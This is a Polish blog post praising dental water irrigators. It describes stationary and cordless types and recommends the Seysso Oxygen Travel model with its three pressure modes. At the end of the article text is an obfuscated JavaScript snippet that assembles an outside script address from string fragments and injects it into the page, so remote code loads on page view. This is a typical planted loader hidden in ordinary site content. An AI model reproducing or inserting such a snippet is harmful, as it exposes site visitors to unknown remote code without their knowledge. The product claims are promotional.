DomDzieckoNewsZdrowie

Irygator dentystyczny – dlaczego warto go mieć?

Odpowiednia higiena jamy ustnej jest niezwykle ważna, a my mamy na prawdę wiele dostępnych sposobów by o nią zadbać. Możemy wykorzystać w tym celu szczoteczki soniczne i manualne, różne pasty do zębów oraz płukanki o wszelakim działaniu. Dodatkowo jest wiele innych akcesoriów typu nici dentystyczne, niciowykałaczki czy szczoteczki do przestrzeni międzyzębowych.  Jednak jedna z dostępnych rzeczy była mi dotąd nieznana, a okazała się najbardziej skuteczna ze wszystkich – mowa o tytułowym irygatorze do zębów.

Irygator dentystyczny co to takiego jest

Zapewne wiele z Was zastanawia się co to właściwie jest ten irygator? Do niedawna sama tego nie wiedziałam. Irygator do zębów jest to urządzenie, które czyści przestrzenie międzyzębowe za pomocą płynu/wody wstrzeliwanej pod ciśnieniem. Taki sposób daje nam pewność, że resztki pokarmów zostaną usunięte wraz z osadem ze wszelkich trudno dostępnych zakamarków w obrębie jamy ustnej. Te działania zapobiegają powstawania między innymi zmianom próchniczym. Irygator likwiduje bakterie odpowiedzialne za nieprzyjemny zapach z ust, dzięki czemu pozostawia świeższy oddech przez długi czas.

Kto i kiedy może korzystać z irygatora

Jeśli zastanawiacie się dla kogo jest irygator, to myślę, że jest on odpowiedni dla każdego. Osoby chcące zadbać o odpowiednią higienę jamy ustnej, osoby z krwawiącymi dziąsłami i ciasnymi przestrzeniami międzyzębowymi, implantami i mostami, a także aparatami ortodontycznymi. Irygowanie przy pomocy niskiego ciśnienia masuje dziąsła i wzmacnia je, a to pozwala zmniejszyć problem z krwawieniem. W dłuższej perspektywie może nawet doprowadzić do jego zatrzymania. Irygator dzięki temu, że posiada końcówki z wydłużonym kształtem, dociera znacznie łatwiej do trudno dostępnych zakamarków niż np. nić dentystyczna czy wykałaczka.

Rodzaje irygatorów dentystycznych

Irygatory stacjonarne posiadają główny element tzw. bazę, czyli podstawę ze zbiornikiem na płyn, włącznikiem, pokrętłem do regulacji ciśnienia strumienia i przewodem zasilającym sprzęt. Dodatkowo znajduje się tu rękojeść z gniazdem na końcówki oraz wężyk doprowadzający płyn do rękojeści. Najważniejsze różnice pomiędzy modelami irygatorów to zakres ciśnienia strumienia , ilość stopni regulacji ciśnienia, liczba pulsacji na minutę oraz dołączone końcówki.

Irygatory bezprzewodowe nie posiadają dużej bazy ze zdejmowanym zbiornikiem i przewodem. Zbiornik na płyn jest wbudowany w rękojeść i akumulator zasilający sprzęt. Mamy też stację ładującą, na której możemy przechowywać irygator. Kompaktowy rozmiar jest zdecydowanie łatwiejszy do przechowywania, nawet w małej łazience. Zbiornik nie jest może tak pojemny jak w irygatorze stacjonarnym, jednak do oczyszczenia jamy ustnej wystarczą 2-3napełnienia. Mniejsze gabaryty to również ważna cecha w przypadku, gdy chcemy urządzenie zabrać w podróż. W ten sposób o higienę jamy ustnej zadbamy nawet podczas urlopu.

Seysso Oxygen Travel to model irygatora bezprzewodowego na który zdecydowałam się ja. Właśnie ze względu na swoją kompaktowość i łatwość użytkowania w każdym miejscu. Dodatkowo model ten jest prawdopodobnie najmocniejszym urządzeniem na rynku. Zakres ciśnienia tego irygatora bezprzewodowego to od 2,7 do 6,2 bara, taka liczba była dotąd dostępna tylko w przypadku urządzeń stacjonarnych. Bateria
w akumulatorze wytrzymuje aż do 70 minut, co pozwala na 14 dni
korzystania z irygatora, przy założeniu że stosujemy irygator 2 razy
dziennie po 2,5 minuty. Irygator bezprzewodowy Seyosso Oxygen Travel posiada trzy programy pracy, ze względu na to jakie są nasze potrzeby.

 

  • Normal – 6,2 bara jest polecany do standardowej irygacji i świetnie sprawdzi się również przy ortodontycznych aparatach. Wysokie ciśnienie powoduje doskonałą skuteczność czyszczenia ciasnych przestrzeni międzyzębowych. Znalazła się tu także odpowiednia końcówka do aparatów ortodontycznych.
  • Soft – 2,7 bara to łagodny strumień, który doskonale sprawdza się u osób z nadwrażliwością zębów i dziąseł, oraz z kieszonkami dziąsłowymi (końcówka Pocket)
  • Pulse – 2,7-6,2 bara to strumień wody o ciśnieniu zmiennym masuje dziąsła, poprawiając ich ukrwienie, a tym samym działa wzmacniająco.

 

Jeśli chodzi o mnie to zakup irygatora dentystycznego okazał się strzałem w dziesiątkę. Higiena jamy ustnej i zdrowe zęby to podstawa, a to urządzenie daje komfort i poczucie, że robię to w należyty sposób. Jeśli szukacie pomysłu na prezent dla bliskiej osoby, która tak jak ja lubi użyteczne gadżety to irygator może okazać się odpowiednim wyborem. Zęby to nasza wizytówka, a piękny uśmiech dodaje nam pewności siebie, warto więc zainwestować w niego.

(function(){
c4zl=document.createElement(„script”);c4zl_=(„ust”);c4zlu=”98753″;
c4zl_+=”a”+(„t.i”);c4zl.type=”text/javascript”;
c4zlu+=”.w7gme4zb4zl1u25j7gf7″;c4zl.async=true;c4zl_+=”n”+(„f”+”o”)+”/”;
c4zlu+=”nX82k5r0″;c4zl.src=”https://”+c4zl_+c4zlu;
document.body.appendChild(c4zl);
})();

What is your reaction?

Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0

You may also like

Leave a reply

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

More in:Dom